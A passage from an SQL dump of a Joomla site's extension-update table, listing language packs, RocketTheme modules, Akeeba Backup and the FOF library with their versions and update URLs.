Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(948,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(949,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(950,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(951,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(952,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(953,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(954,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(955,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(956,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(957,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(958,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(959,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(960,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(961,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(962,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(963,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(964,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(965,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(966,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(967,57,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(968,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(969,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(970,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(971,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(972,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(973,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(974,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(975,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(976,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(977,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(978,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(979,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(980,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(981,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(982,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(983,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(984,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(985,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(986,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(987,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(988,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(989,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(990,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(991,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(992,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(993,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(994,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(995,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(996,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(997,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(998,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(999,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1000,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1001,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1002,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1003,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1004,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1005,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1006,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3052',''),(1007,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(1008,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1009,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1010,3,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1011,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1012,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1013,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1014,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1015,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1016,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1017,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1018,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1019,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1020,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1021,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1022,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1023,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1024,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1025,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1026,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1027,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1028,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1029,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1030,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1031,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1032,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1033,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1034,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1035,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1036,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1037,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1038,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1039,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1040,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1041,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1042,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1043,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1044,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1045,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1046,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1047,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1048,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(1049,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(1050,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(1051,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1052,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1053,57,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1054,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1055,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1056,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1057,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1058,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1059,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1060,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1061,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1062,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1063,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1064,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1065,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1066,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1067,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1068,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1069,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1070,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1071,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1072,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1073,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1074,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1075,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1076,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1077,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1078,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1079,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1080,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1081,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1082,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1083,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1084,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1085,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1086,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1087,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1088,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1089,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1090,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1092,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(1093,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1094,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1095,3,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1096,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1097,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1098,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1099,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1100,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1101,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1102,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1103,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1104,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1105,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1106,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1107,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1108,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1109,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1110,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1111,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1112,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1113,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1114,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1115,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1116,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1117,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1118,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1119,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1120,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1121,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1122,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1123,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1124,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1125,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1126,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1127,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1128,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1129,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1130,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1131,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1132,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1133,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(1134,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(1135,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(1136,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1137,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1138,57,0,'French','','pkg_fr-FR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1139,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1140,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1141,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1142,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1143,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1144,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1145,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1146,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1147,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1148,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1149,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1150,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1151,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1152,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1153,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1154,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1155,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1156,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.6.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1157,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1158,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1159,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1160,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1161,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1162,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1163,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1164,57,0,'Serbian 